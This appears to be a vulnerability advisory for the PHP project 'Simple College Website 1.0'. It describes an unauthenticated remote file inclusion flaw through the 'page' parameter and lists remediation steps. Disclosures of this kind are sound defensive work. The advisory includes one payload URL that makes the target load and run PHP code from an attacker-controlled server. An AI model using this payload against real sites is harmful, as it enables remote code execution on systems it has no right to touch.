Simple College Website 1.0 is vulnerable to a Remote File Include (RFI) attack. User input could be passed into file include commands and the web application could be tricked into including remote files with malicious code. Attacker can execute commands without authenticating into the system.
Vendor Homepage: https://www.sourcecodester.com/php/14548/simple-college-website-using-htmlphpmysqli-source-code.html
Source Code: https://www.sourcecodester.com/sites/default/files/download/oretnom23/simple-college-website.zip
Root cause Analysis and Hacking
Let’s look at the source code which caused the RFI.
line 72 uses “include” expression to include the php. We could clearly see that there is no input validation or sanitisation. Hence, we can include Remote php files and execute it on the target.
Payload:
http://<target>/college_website/admin/index.php?page=http://<our_server>/exploit
Condition:
- To allow inclusion of remote files, the directive allow_url_include must be set to On in php.ini
We can create a local python simple HTTP server and server the remote php file for exploitation.
There is no need for authentication to get the RFI and execute remote code. Hence, it is an unauthenticated RFI.
Remediation
- Authentication of requests made by the user.
- Checking for file location when including it.
- disabling allow_url_include
- Input sanitisation and validation.
